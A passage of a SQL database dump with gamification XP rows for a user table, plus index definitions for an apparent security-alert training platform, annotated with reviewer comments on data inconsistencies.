  `created_at` timestamp NULL DEFAULT current_timestamp(),
  -- Bumped automatically by the engine on every UPDATE of the row.
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_xp`
--

-- Dumped rows for `user_xp`, one per user (`user_id` becomes the primary key in
-- the index section below).
-- NOTE(review): data-integrity observations on these rows; the schema forbids
-- none of them, so they are only flagged here:
--   * monthly_xp exceeds total_xp for user_id 225, 232 and 283.
--   * total_xp is above xp_to_next_level while current_level is still 1 for
--     user_id 176 (130 vs 100); user_id 284 sits at 100/100 on level 1 while
--     user_id 93 is level 2 at 100 -- presumably level-up is applied lazily;
--     confirm against the application's XP logic.
--   * last_activity_date is sometimes a day ahead of updated_at (e.g. user_id 1:
--     2026-03-16 vs 2026-03-15 21:05:01), i.e. it looks computed in a different
--     time zone from the timestamp columns -- confirm.
INSERT INTO `user_xp` (`user_id`, `total_xp`, `monthly_xp`, `current_level`, `xp_to_next_level`, `streak_days`, `last_activity_date`, `created_at`, `updated_at`) VALUES
(1, 3435, 3165, 35, 3500, 42, '2026-03-16', '2025-12-26 10:00:34', '2026-03-15 21:05:01'),
(28, 50, 50, 1, 100, 1, '2026-03-16', '2026-03-15 21:09:15', '2026-03-15 21:09:15'),
(34, 6712, 5402, 68, 6800, 11, '2026-03-16', '2025-12-26 00:52:27', '2026-03-16 02:48:47'),
(40, 0, 0, 1, 100, 0, NULL, '2025-12-27 04:17:43', '2025-12-27 04:17:43'),
(42, 1780, 1350, 18, 1800, 2, '2026-03-13', '2025-12-27 11:51:16', '2026-03-13 10:01:53'),
(44, 0, 0, 1, 100, 0, NULL, '2025-12-27 21:00:47', '2025-12-27 21:00:47'),
(45, 50, 50, 1, 100, 1, '2026-02-17', '2025-12-28 17:13:20', '2026-02-17 02:54:20'),
(49, 0, 0, 1, 100, 0, NULL, '2026-01-04 22:28:27', '2026-01-04 22:28:27'),
(50, 0, 0, 1, 100, 0, NULL, '2025-12-28 22:58:56', '2025-12-28 22:58:56'),
(51, 0, 0, 1, 100, 0, NULL, '2025-12-28 21:56:13', '2025-12-28 21:56:13'),
(52, 150, 150, 2, 200, 1, '2026-02-02', '2025-12-29 08:08:59', '2026-02-02 12:19:05'),
(54, 150, 50, 2, 200, 1, '2026-01-17', '2025-12-29 21:45:59', '2026-01-17 03:00:52'),
(55, 50, 50, 1, 100, 1, '2026-03-09', '2026-03-09 12:47:21', '2026-03-09 12:47:21'),
(56, 350, 350, 4, 400, 1, '2026-03-11', '2025-12-31 07:27:18', '2026-03-11 06:19:11'),
(60, 50, 50, 1, 100, 1, '2026-02-16', '2026-01-02 00:57:21', '2026-02-16 06:05:42'),
(61, 0, 0, 1, 100, 0, NULL, '2026-01-02 06:48:50', '2026-01-02 06:48:50'),
(65, 270, 200, 3, 300, 1, '2026-03-11', '2026-01-06 06:48:50', '2026-03-11 19:58:17'),
(68, 0, 0, 1, 100, 0, NULL, '2026-01-07 16:01:15', '2026-01-07 16:01:15'),
(71, 0, 0, 1, 100, 0, NULL, '2026-01-10 06:39:37', '2026-01-10 06:39:37'),
(72, 0, 0, 1, 100, 0, NULL, '2026-01-10 14:15:16', '2026-01-10 14:15:16'),
(74, 600, 450, 7, 700, 1, '2026-02-27', '2026-01-12 06:24:51', '2026-02-27 19:08:05'),
(77, 520, 520, 6, 600, 3, '2026-01-16', '2026-01-14 00:44:07', '2026-01-15 21:01:36'),
(78, 1749, 1669, 18, 1800, 1, '2026-03-15', '2026-01-14 03:22:07', '2026-03-15 05:52:34'),
(79, 3275, 3275, 33, 3300, 1, '2026-02-25', '2026-01-15 22:39:00', '2026-02-24 21:52:12'),
(83, 50, 50, 1, 100, 1, '2026-01-16', '2026-01-16 00:10:35', '2026-01-16 00:10:35'),
(84, 805, 805, 9, 900, 1, '2026-03-16', '2026-01-16 00:13:21', '2026-03-15 21:49:58'),
(85, 50, 50, 1, 100, 1, '2026-01-16', '2026-01-16 13:33:38', '2026-01-16 13:33:38'),
(86, 120, 120, 2, 200, 1, '2026-02-06', '2026-01-16 18:34:30', '2026-02-06 11:29:56'),
(88, 70, 70, 1, 100, 1, '2026-01-18', '2026-01-18 15:26:50', '2026-01-18 15:27:30'),
(89, 50, 50, 1, 100, 1, '2026-01-20', '2026-01-20 00:26:18', '2026-01-20 00:26:18'),
(91, 50, 50, 1, 100, 1, '2026-01-20', '2026-01-20 10:38:45', '2026-01-20 10:38:45'),
(93, 100, 100, 2, 200, 2, '2026-01-21', '2026-01-20 20:57:26', '2026-01-20 21:13:49'),
(94, 200, 200, 3, 300, 1, '2026-02-16', '2026-01-21 01:57:28', '2026-02-16 15:32:11'),
(95, 150, 150, 2, 200, 2, '2026-02-15', '2026-01-21 17:18:24', '2026-02-15 11:08:46'),
(96, 50, 50, 1, 100, 1, '2026-01-22', '2026-01-22 04:14:21', '2026-01-22 04:14:21'),
(97, 50, 50, 1, 100, 1, '2026-01-25', '2026-01-25 05:05:00', '2026-01-25 05:05:01'),
(98, 50, 50, 1, 100, 1, '2026-01-25', '2026-01-25 08:18:33', '2026-01-25 08:18:33'),
(99, 2140, 2090, 22, 2200, 2, '2026-03-15', '2026-01-25 15:13:11', '2026-03-15 17:43:57'),
(100, 250, 250, 3, 300, 1, '2026-02-08', '2026-01-25 19:37:32', '2026-02-08 19:28:00'),
(101, 90, 90, 1, 100, 1, '2026-01-26', '2026-01-25 21:04:12', '2026-01-26 06:11:41'),
(102, 2022, 2022, 21, 2100, 2, '2026-03-16', '2026-01-25 21:54:59', '2026-03-15 21:15:35'),
(103, 50, 50, 1, 100, 1, '2026-01-26', '2026-01-26 01:37:19', '2026-01-26 01:37:19'),
(105, 50, 50, 1, 100, 1, '2026-01-26', '2026-01-26 03:44:00', '2026-01-26 03:44:00'),
(106, 50, 50, 1, 100, 1, '2026-01-26', '2026-01-26 04:15:35', '2026-01-26 04:15:35'),
(107, 520, 520, 6, 600, 1, '2026-02-12', '2026-01-27 19:45:52', '2026-02-12 01:40:19'),
(108, 100, 100, 2, 200, 1, '2026-02-17', '2026-01-27 19:55:50', '2026-02-17 17:15:33'),
(109, 4195, 3915, 42, 4200, 4, '2026-03-15', '2026-01-27 21:07:58', '2026-03-15 10:13:00'),
(110, 50, 50, 1, 100, 1, '2026-01-30', '2026-01-30 13:36:10', '2026-01-30 13:36:10'),
(111, 50, 50, 1, 100, 1, '2026-01-30', '2026-01-30 14:52:10', '2026-01-30 14:52:10'),
(112, 200, 200, 3, 300, 1, '2026-02-23', '2026-01-30 14:53:31', '2026-02-23 01:29:57'),
(113, 100, 100, 2, 200, 1, '2026-02-21', '2026-01-30 14:55:30', '2026-02-21 20:55:48'),
(114, 110, 110, 2, 200, 1, '2026-02-12', '2026-01-30 14:57:29', '2026-02-11 23:41:56'),
(115, 50, 50, 1, 100, 1, '2026-01-31', '2026-01-31 12:37:59', '2026-01-31 12:37:59'),
(116, 50, 50, 1, 100, 1, '2026-02-01', '2026-02-01 09:07:06', '2026-02-01 09:07:06'),
(117, 50, 50, 1, 100, 1, '2026-02-01', '2026-02-01 16:19:55', '2026-02-01 16:19:55'),
(118, 260, 260, 3, 300, 1, '2026-02-18', '2026-02-01 16:22:10', '2026-02-18 00:58:34'),
(119, 390, 390, 4, 400, 2, '2026-02-19', '2026-02-01 16:28:52', '2026-02-18 21:29:28'),
(120, 100, 100, 2, 200, 1, '2026-02-18', '2026-02-01 16:29:26', '2026-02-18 00:21:52'),
(122, 50, 50, 1, 100, 1, '2026-02-01', '2026-02-01 19:54:00', '2026-02-01 19:54:00'),
(123, 150, 150, 2, 200, 1, '2026-02-07', '2026-02-02 10:07:00', '2026-02-07 06:51:47'),
(124, 50, 50, 1, 100, 1, '2026-02-02', '2026-02-02 10:09:51', '2026-02-02 10:09:51'),
(125, 50, 50, 1, 100, 1, '2026-02-04', '2026-02-04 01:33:49', '2026-02-04 01:33:49'),
(126, 250, 250, 3, 300, 1, '2026-03-09', '2026-02-04 22:06:23', '2026-03-09 10:20:56'),
(127, 50, 50, 1, 100, 1, '2026-02-05', '2026-02-05 17:48:44', '2026-02-05 17:48:44'),
(128, 50, 50, 1, 100, 1, '2026-02-07', '2026-02-07 01:17:20', '2026-02-07 01:17:20'),
(129, 50, 50, 1, 100, 1, '2026-02-08', '2026-02-07 21:51:40', '2026-02-07 21:51:40'),
(131, 50, 50, 1, 100, 1, '2026-02-08', '2026-02-08 08:16:27', '2026-02-08 08:16:27'),
(133, 150, 150, 2, 200, 1, '2026-02-11', '2026-02-08 16:07:42', '2026-02-11 02:31:48'),
(135, 50, 50, 1, 100, 1, '2026-02-08', '2026-02-08 17:42:25', '2026-02-08 17:42:25'),
(136, 50, 50, 1, 100, 1, '2026-02-10', '2026-02-09 22:07:26', '2026-02-09 22:07:26'),
(137, 150, 150, 2, 200, 1, '2026-02-13', '2026-02-10 12:44:46', '2026-02-12 23:42:16'),
(138, 50, 50, 1, 100, 1, '2026-02-11', '2026-02-11 17:02:51', '2026-02-11 17:02:51'),
(140, 100, 100, 2, 200, 1, '2026-02-24', '2026-02-11 17:05:52', '2026-02-24 04:15:59'),
(141, 100, 100, 2, 200, 2, '2026-02-13', '2026-02-12 03:16:21', '2026-02-13 19:00:17'),
(142, 210, 210, 3, 300, 1, '2026-03-07', '2026-02-14 06:26:33', '2026-03-07 05:07:09'),
(143, 100, 100, 2, 200, 2, '2026-02-15', '2026-02-14 08:38:59', '2026-02-15 16:30:47'),
(144, 225, 225, 3, 300, 1, '2026-03-13', '2026-02-14 09:29:42', '2026-03-13 03:49:54'),
(145, 50, 50, 1, 100, 1, '2026-02-14', '2026-02-14 09:37:01', '2026-02-14 09:37:01'),
(146, 100, 100, 2, 200, 2, '2026-02-15', '2026-02-14 15:55:20', '2026-02-15 18:44:12'),
(147, 402, 392, 5, 500, 1, '2026-03-15', '2026-02-14 16:15:24', '2026-03-15 00:47:45'),
(148, 190, 190, 2, 200, 2, '2026-02-15', '2026-02-14 17:00:20', '2026-02-15 04:27:04'),
(149, 70, 70, 1, 100, 1, '2026-02-14', '2026-02-14 17:53:24', '2026-02-14 17:55:56'),
(150, 250, 250, 3, 300, 1, '2026-03-13', '2026-02-14 18:33:44', '2026-03-13 03:10:28'),
(151, 132, 132, 2, 200, 1, '2026-03-15', '2026-02-14 19:16:09', '2026-03-15 04:17:41'),
(152, 50, 50, 1, 100, 1, '2026-02-15', '2026-02-15 01:20:20', '2026-02-15 01:20:20'),
(153, 50, 50, 1, 100, 1, '2026-02-15', '2026-02-15 01:39:04', '2026-02-15 01:39:04'),
(154, 110, 100, 2, 200, 1, '2026-02-20', '2026-02-15 03:41:01', '2026-02-20 00:24:58'),
(155, 50, 50, 1, 100, 1, '2026-02-15', '2026-02-15 11:06:27', '2026-02-15 11:06:27'),
(156, 75, 75, 1, 100, 1, '2026-02-15', '2026-02-15 20:43:36', '2026-02-15 20:45:59'),
(157, 320, 320, 4, 400, 1, '2026-03-10', '2026-02-15 21:26:27', '2026-03-10 04:57:36'),
(158, 50, 50, 1, 100, 1, '2026-02-16', '2026-02-15 23:21:17', '2026-02-15 23:21:17'),
(159, 50, 50, 1, 100, 1, '2026-02-16', '2026-02-15 23:22:19', '2026-02-15 23:22:19'),
(160, 170, 130, 2, 200, 1, '2026-03-09', '2026-02-15 23:40:38', '2026-03-09 17:44:32'),
(162, 50, 50, 1, 100, 1, '2026-02-16', '2026-02-16 12:06:12', '2026-02-16 12:06:12'),
(163, 110, 110, 2, 200, 1, '2026-02-16', '2026-02-16 12:22:16', '2026-02-16 12:26:00'),
(164, 120, 100, 2, 200, 1, '2026-02-25', '2026-02-16 14:54:13', '2026-02-24 21:58:12'),
(165, 6515, 6355, 66, 6600, 2, '2026-02-24', '2026-02-16 17:14:52', '2026-02-24 19:53:49'),
(166, 100, 100, 2, 200, 1, '2026-02-19', '2026-02-17 15:29:06', '2026-02-19 07:34:12'),
(168, 50, 50, 1, 100, 1, '2026-02-18', '2026-02-18 06:47:47', '2026-02-18 06:47:47'),
(169, 50, 50, 1, 100, 1, '2026-02-18', '2026-02-18 07:17:16', '2026-02-18 07:17:16'),
(170, 65, 65, 1, 100, 1, '2026-02-18', '2026-02-18 08:19:47', '2026-02-18 08:21:32'),
(171, 50, 50, 1, 100, 1, '2026-02-18', '2026-02-18 09:49:54', '2026-02-18 09:49:54'),
(172, 140, 140, 2, 200, 1, '2026-03-05', '2026-02-18 11:05:58', '2026-03-05 11:51:32'),
(173, 460, 400, 5, 500, 1, '2026-03-13', '2026-02-18 12:13:49', '2026-03-13 10:48:07'),
(174, 345, 265, 4, 400, 1, '2026-02-26', '2026-02-18 15:07:08', '2026-02-26 05:00:25'),
(175, 130, 120, 2, 200, 1, '2026-02-20', '2026-02-18 15:40:02', '2026-02-20 02:08:28'),
(176, 130, 50, 1, 100, 1, '2026-02-19', '2026-02-19 03:47:11', '2026-02-19 03:48:50'),
(177, 3401, 3261, 35, 3500, 1, '2026-03-15', '2026-02-19 04:01:45', '2026-03-15 04:30:01'),
(178, 200, 200, 3, 300, 1, '2026-03-03', '2026-02-19 05:19:13', '2026-03-03 08:38:17'),
(179, 175, 175, 2, 200, 1, '2026-03-01', '2026-02-19 12:58:35', '2026-03-01 18:40:25'),
(180, 1582, 1232, 16, 1600, 1, '2026-03-16', '2026-02-19 15:44:06', '2026-03-16 03:21:28'),
(181, 100, 100, 2, 200, 1, '2026-02-22', '2026-02-20 03:04:07', '2026-02-22 02:58:42'),
(182, 215, 215, 3, 300, 1, '2026-03-13', '2026-02-20 03:10:13', '2026-03-13 02:31:12'),
(183, 130, 130, 2, 200, 1, '2026-02-20', '2026-02-20 03:54:45', '2026-02-20 04:23:32'),
(184, 100, 100, 2, 200, 1, '2026-03-02', '2026-02-20 07:52:54', '2026-03-02 17:01:07'),
(185, 50, 50, 1, 100, 1, '2026-02-20', '2026-02-20 08:58:20', '2026-02-20 08:58:20'),
(186, 160, 140, 2, 200, 2, '2026-02-21', '2026-02-20 16:30:40', '2026-02-21 05:09:14'),
(187, 270, 230, 3, 300, 1, '2026-03-15', '2026-02-21 03:05:54', '2026-03-15 03:17:42'),
(188, 110, 80, 2, 200, 1, '2026-02-21', '2026-02-21 15:36:57', '2026-02-21 20:54:31'),
(189, 310, 310, 4, 400, 1, '2026-03-09', '2026-02-21 18:34:58', '2026-03-08 22:12:29'),
(191, 50, 50, 1, 100, 1, '2026-02-22', '2026-02-22 01:39:31', '2026-02-22 01:39:31'),
(193, 70, 70, 1, 100, 1, '2026-02-22', '2026-02-22 18:24:07', '2026-02-22 18:24:56'),
(194, 70, 70, 1, 100, 1, '2026-02-23', '2026-02-23 03:17:17', '2026-02-23 03:21:52'),
(195, 725, 635, 8, 800, 3, '2026-03-11', '2026-02-23 16:00:49', '2026-03-11 12:06:09'),
(196, 600, 540, 7, 700, 1, '2026-02-27', '2026-02-23 17:35:01', '2026-02-27 06:52:20'),
(197, 100, 100, 2, 200, 1, '2026-02-25', '2026-02-23 18:53:24', '2026-02-25 17:48:36'),
(198, 50, 50, 1, 100, 1, '2026-02-24', '2026-02-23 23:51:02', '2026-02-23 23:51:02'),
(199, 750, 750, 8, 800, 4, '2026-03-15', '2026-02-23 23:52:04', '2026-03-15 20:17:58'),
(201, 50, 50, 1, 100, 1, '2026-02-24', '2026-02-24 07:41:32', '2026-02-24 07:41:32'),
(202, 265, 255, 3, 300, 1, '2026-03-02', '2026-02-24 15:31:24', '2026-03-02 14:56:11'),
(203, 75, 75, 1, 100, 1, '2026-02-24', '2026-02-24 19:39:58', '2026-02-24 19:48:18'),
(204, 65, 65, 1, 100, 1, '2026-02-24', '2026-02-24 20:47:37', '2026-02-24 20:50:34'),
(205, 50, 50, 1, 100, 1, '2026-02-25', '2026-02-24 21:22:17', '2026-02-24 21:22:17'),
(208, 140, 130, 2, 200, 1, '2026-02-25', '2026-02-25 10:19:29', '2026-02-25 10:40:02'),
(209, 210, 190, 3, 300, 1, '2026-02-27', '2026-02-25 11:04:35', '2026-02-27 04:03:26'),
(210, 235, 235, 3, 300, 1, '2026-03-05', '2026-02-25 20:27:58', '2026-03-04 23:46:33'),
(211, 105, 105, 2, 200, 1, '2026-03-01', '2026-02-26 20:39:14', '2026-03-01 10:11:04'),
(212, 65, 65, 1, 100, 1, '2026-02-26', '2026-02-26 20:55:15', '2026-02-26 20:56:54'),
(213, 100, 100, 2, 200, 1, '2026-03-15', '2026-02-26 21:11:46', '2026-03-15 20:21:01'),
(214, 310, 310, 4, 400, 2, '2026-03-16', '2026-02-27 05:57:14', '2026-03-16 01:43:14'),
(216, 130, 130, 2, 200, 1, '2026-03-06', '2026-02-27 16:15:15', '2026-03-06 11:05:56'),
(217, 200, 200, 3, 300, 2, '2026-03-04', '2026-02-27 23:39:31', '2026-03-04 16:47:46'),
(219, 175, 175, 2, 200, 1, '2026-02-28', '2026-02-28 10:30:04', '2026-02-28 10:31:21'),
(220, 790, 780, 8, 800, 1, '2026-03-13', '2026-02-28 10:37:15', '2026-03-13 01:30:22'),
(221, 150, 150, 2, 200, 3, '2026-03-03', '2026-03-01 01:54:20', '2026-03-02 23:10:50'),
(223, 130, 130, 2, 200, 1, '2026-03-01', '2026-03-01 15:34:15', '2026-03-01 15:57:12'),
(224, 50, 50, 1, 100, 1, '2026-03-01', '2026-03-01 15:54:53', '2026-03-01 15:54:53'),
(225, 3565, 4165, 36, 3600, 2, '2026-03-16', '2026-03-02 00:59:56', '2026-03-16 03:28:00'),
(226, 50, 50, 1, 100, 1, '2026-03-02', '2026-03-02 05:26:28', '2026-03-02 05:26:28'),
(227, 50, 50, 1, 100, 1, '2026-03-02', '2026-03-02 08:22:45', '2026-03-02 08:22:45'),
(228, 55, 55, 1, 100, 1, '2026-03-02', '2026-03-02 11:52:48', '2026-03-02 11:54:00'),
(229, 775, 715, 8, 800, 1, '2026-03-14', '2026-03-02 14:11:54', '2026-03-14 18:05:20'),
(230, 352, 332, 4, 400, 1, '2026-03-09', '2026-03-02 16:47:27', '2026-03-09 17:32:28'),
(231, 80, 50, 1, 100, 1, '2026-03-02', '2026-03-02 20:15:37', '2026-03-02 20:20:57'),
(232, 6610, 7010, 67, 6700, 4, '2026-03-16', '2026-03-03 03:13:42', '2026-03-16 02:27:14'),
(233, 50, 50, 1, 100, 1, '2026-03-03', '2026-03-03 09:48:24', '2026-03-03 09:48:24'),
(234, 302, 302, 4, 400, 2, '2026-03-06', '2026-03-03 19:39:00', '2026-03-06 15:03:21'),
(235, 50, 50, 1, 100, 1, '2026-03-03', '2026-03-03 20:12:52', '2026-03-03 20:12:52'),
(236, 60, 60, 1, 100, 1, '2026-03-04', '2026-03-03 22:19:11', '2026-03-03 23:27:14'),
(237, 390, 390, 4, 400, 1, '2026-03-13', '2026-03-03 23:25:52', '2026-03-13 16:21:54'),
(238, 120, 120, 2, 200, 1, '2026-03-15', '2026-03-04 15:20:05', '2026-03-15 13:26:25'),
(240, 85, 55, 1, 100, 1, '2026-03-04', '2026-03-04 09:32:22', '2026-03-04 09:38:40'),
(241, 50, 50, 1, 100, 1, '2026-03-04', '2026-03-04 16:22:00', '2026-03-04 16:22:00'),
(243, 50, 50, 1, 100, 1, '2026-03-04', '2026-03-04 19:33:29', '2026-03-04 19:33:29'),
(244, 50, 50, 1, 100, 1, '2026-03-04', '2026-03-04 20:19:50', '2026-03-04 20:19:50'),
(245, 50, 50, 1, 100, 1, '2026-03-05', '2026-03-05 04:55:28', '2026-03-05 04:55:28'),
(246, 50, 50, 1, 100, 1, '2026-03-05', '2026-03-05 07:51:19', '2026-03-05 07:51:19'),
(247, 50, 50, 1, 100, 1, '2026-03-05', '2026-03-05 11:37:09', '2026-03-05 11:37:09'),
(248, 205, 205, 3, 300, 2, '2026-03-14', '2026-03-05 17:39:49', '2026-03-13 21:29:50'),
(250, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 02:52:54', '2026-03-06 02:52:54'),
(251, 100, 100, 2, 200, 1, '2026-03-10', '2026-03-06 04:45:14', '2026-03-10 05:12:57'),
(254, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 07:04:38', '2026-03-06 07:04:38'),
(256, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 08:30:52', '2026-03-06 08:30:52'),
(257, 65, 65, 1, 100, 1, '2026-03-06', '2026-03-06 10:11:37', '2026-03-06 10:16:04'),
(258, 50, 50, 1, 100, 1, '2026-03-06', '2026-03-06 15:19:11', '2026-03-06 15:19:11'),
(259, 260, 260, 3, 300, 4, '2026-03-10', '2026-03-06 21:08:25', '2026-03-09 23:13:45'),
(260, 1290, 1290, 13, 1300, 2, '2026-03-16', '2026-03-07 10:20:12', '2026-03-15 21:27:59'),
(261, 200, 200, 3, 300, 1, '2026-03-12', '2026-03-07 08:27:44', '2026-03-12 08:25:19'),
(262, 55, 55, 1, 100, 1, '2026-03-08', '2026-03-08 18:31:44', '2026-03-08 18:33:57'),
(263, 90, 90, 1, 100, 1, '2026-03-09', '2026-03-08 22:31:00', '2026-03-08 22:31:54'),
(264, 162, 132, 2, 200, 1, '2026-03-09', '2026-03-09 09:41:22', '2026-03-09 09:48:51'),
(265, 50, 50, 1, 100, 1, '2026-03-09', '2026-03-09 11:10:06', '2026-03-09 11:10:06'),
(266, 520, 500, 6, 600, 2, '2026-03-15', '2026-03-09 12:09:26', '2026-03-15 14:35:10'),
(267, 57, 57, 1, 100, 1, '2026-03-09', '2026-03-09 19:38:56', '2026-03-09 19:39:56'),
(268, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-09 23:49:10', '2026-03-09 23:49:10'),
(269, 125, 105, 2, 200, 1, '2026-03-10', '2026-03-10 03:37:14', '2026-03-10 03:44:48'),
(270, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-10 04:25:37', '2026-03-10 04:25:37'),
(271, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-10 05:08:04', '2026-03-10 05:08:04'),
(272, 50, 50, 1, 100, 1, '2026-03-10', '2026-03-10 11:07:44', '2026-03-10 11:07:44'),
(273, 95, 95, 1, 100, 1, '2026-03-10', '2026-03-10 13:55:18', '2026-03-10 13:59:07'),
(274, 155, 155, 2, 200, 2, '2026-03-11', '2026-03-10 20:57:39', '2026-03-10 21:04:16'),
(275, 85, 85, 1, 100, 1, '2026-03-11', '2026-03-11 02:54:27', '2026-03-11 10:53:17'),
(276, 55, 55, 1, 100, 1, '2026-03-11', '2026-03-11 08:19:33', '2026-03-11 08:21:05'),
(277, 50, 50, 1, 100, 1, '2026-03-11', '2026-03-11 11:43:14', '2026-03-11 11:43:14'),
(278, 120, 120, 2, 200, 1, '2026-03-11', '2026-03-11 13:28:04', '2026-03-11 13:29:09'),
(279, 70, 50, 1, 100, 1, '2026-03-11', '2026-03-11 13:41:15', '2026-03-11 13:43:29'),
(281, 50, 50, 1, 100, 1, '2026-03-12', '2026-03-11 22:36:22', '2026-03-11 22:36:22'),
(282, 50, 50, 1, 100, 1, '2026-03-12', '2026-03-11 23:46:34', '2026-03-11 23:46:34'),
(283, 2250, 3250, 23, 2300, 2, '2026-03-16', '2026-03-11 23:58:52', '2026-03-15 22:34:59'),
(284, 100, 80, 1, 100, 1, '2026-03-12', '2026-03-12 04:41:56', '2026-03-12 04:50:23'),
(285, 75, 65, 1, 100, 1, '2026-03-12', '2026-03-12 07:19:13', '2026-03-12 07:40:14'),
(287, 100, 100, 2, 200, 1, '2026-03-14', '2026-03-12 08:39:19', '2026-03-14 16:22:04'),
(288, 285, 285, 3, 300, 2, '2026-03-13', '2026-03-12 09:30:46', '2026-03-13 12:22:50'),
(289, 65, 65, 1, 100, 1, '2026-03-12', '2026-03-12 10:05:43', '2026-03-12 20:33:07'),
(290, 80, 80, 1, 100, 1, '2026-03-12', '2026-03-12 13:49:37', '2026-03-12 14:11:40'),
(291, 100, 100, 2, 200, 1, '2026-03-16', '2026-03-13 00:33:31', '2026-03-16 03:17:10'),
(292, 100, 100, 2, 200, 2, '2026-03-14', '2026-03-13 09:01:21', '2026-03-13 21:35:44'),
(294, 65, 65, 1, 100, 1, '2026-03-14', '2026-03-14 04:14:34', '2026-03-14 04:15:23'),
(295, 80, 80, 1, 100, 1, '2026-03-14', '2026-03-14 06:24:03', '2026-03-14 06:30:44'),
(296, 197, 177, 2, 200, 2, '2026-03-15', '2026-03-14 16:24:44', '2026-03-14 21:29:32'),
(297, 105, 105, 2, 200, 2, '2026-03-15', '2026-03-14 16:34:44', '2026-03-15 10:44:23'),
(298, 100, 100, 2, 200, 2, '2026-03-15', '2026-03-14 18:38:45', '2026-03-14 21:07:17'),
(299, 150, 150, 2, 200, 1, '2026-03-15', '2026-03-14 21:38:06', '2026-03-14 21:43:38'),
(300, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-14 23:29:20', '2026-03-14 23:29:20'),
(301, 130, 130, 2, 200, 1, '2026-03-15', '2026-03-15 07:46:35', '2026-03-15 07:54:52'),
(302, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-15 10:47:32', '2026-03-15 10:47:33'),
(303, 140, 140, 2, 200, 1, '2026-03-15', '2026-03-15 17:12:46', '2026-03-15 17:37:43'),
(304, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-15 17:28:59', '2026-03-15 17:28:59'),
(305, 140, 130, 2, 200, 1, '2026-03-15', '2026-03-15 17:51:17', '2026-03-15 17:57:35'),
(306, 50, 50, 1, 100, 1, '2026-03-15', '2026-03-15 18:10:23', '2026-03-15 18:10:23'),
(307, 70, 70, 1, 100, 1, '2026-03-15', '2026-03-15 18:38:43', '2026-03-15 18:44:55'),
(308, 50, 50, 1, 100, 1, '2026-03-16', '2026-03-16 01:42:42', '2026-03-16 01:42:42');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `alerts`
--
-- Only the surrogate primary key is declared for `alerts`, `alert_grades` and
-- `badges`; no secondary index appears in this section for any of them.
ALTER TABLE `alerts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `alert_grades`
--
ALTER TABLE `alert_grades`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `badges`
--
ALTER TABLE `badges`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `beta_signups`
--
-- `unique_email` makes a duplicate sign-up fail at the database, independent of
-- any check the application performs first.
ALTER TABLE `beta_signups`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_email` (`email`);

--
-- Indexes for table `blog_posts`
--
-- A slug resolves to at most one post.
ALTER TABLE `blog_posts`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `slug` (`slug`);

--
-- Indexes for table `email_logs`
--
-- Secondary indexes for lookups by recipient, by send time and by user. The
-- `user_id` key has the shape a foreign key to `users` would need; the
-- constraint itself, if one exists, is declared outside this section.
ALTER TABLE `email_logs`
  ADD PRIMARY KEY (`id`),
  ADD KEY `recipient_email` (`recipient_email`),
  ADD KEY `sent_at` (`sent_at`),
  ADD KEY `user_id` (`user_id`);

--
-- Indexes for table `feedbacks`
--
ALTER TABLE `feedbacks`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `investigations`
--
-- Per-user and per-alert lookups. (`user_id`, `alert_id`) is deliberately not
-- unique here: one user may hold several investigations of the same alert.
ALTER TABLE `investigations`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `investigation_notes`
--
-- Same access pattern as `investigations`: notes are fetched per user or per
-- alert, with no uniqueness on the pair.
ALTER TABLE `investigation_notes`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `alert_id` (`alert_id`);

--
-- Indexes for table `learning_paths`
--
ALTER TABLE `learning_paths`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `lesson_content`
--
-- At most one content row per task.
ALTER TABLE `lesson_content`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `unique_task_content` (`task_id`);

--
-- Indexes for table `lesson_questions`
--
-- Ordered retrieval of a task's questions. The index is not unique, so two
-- questions of one task may share a `question_order` at the schema level.
ALTER TABLE `lesson_questions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_task_order` (`task_id`,`question_order`);

--
-- Indexes for table `mobile_lesson_completions`
--
-- `idx_user_lesson` is a plain (non-unique) key, so repeated completions of the
-- same lesson by one user are allowed here, unlike `user_task_progress`, whose
-- (user, task) pair is unique further down. `idx_user_date` serves per-user
-- time-ordered queries on `completed_at`.
ALTER TABLE `mobile_lesson_completions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_user_lesson` (`user_id`,`lesson_id`),
  ADD KEY `idx_user_date` (`user_id`,`completed_at`);

--
-- Indexes for table `modules`
--
-- `prerequisite_module_id` indexes the self-reference between modules;
-- `idx_modules_path` lists the modules of one learning path.
ALTER TABLE `modules`
  ADD PRIMARY KEY (`id`),
  ADD KEY `prerequisite_module_id` (`prerequisite_module_id`),
  ADD KEY `idx_modules_path` (`learning_path_id`);

--
-- Indexes for table `newsletter_subscribers`
--
-- One subscription per address, enforced by the database.
ALTER TABLE `newsletter_subscribers`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `email` (`email`);

--
-- Indexes for table `notifications`
--
ALTER TABLE `notifications`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `operations`
--
ALTER TABLE `operations`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `operation_alerts`
--
-- Link rows between operations and alerts, indexed from both sides; the pair
-- is not declared unique, so the same alert may be attached to an operation
-- more than once at the schema level.
ALTER TABLE `operation_alerts`
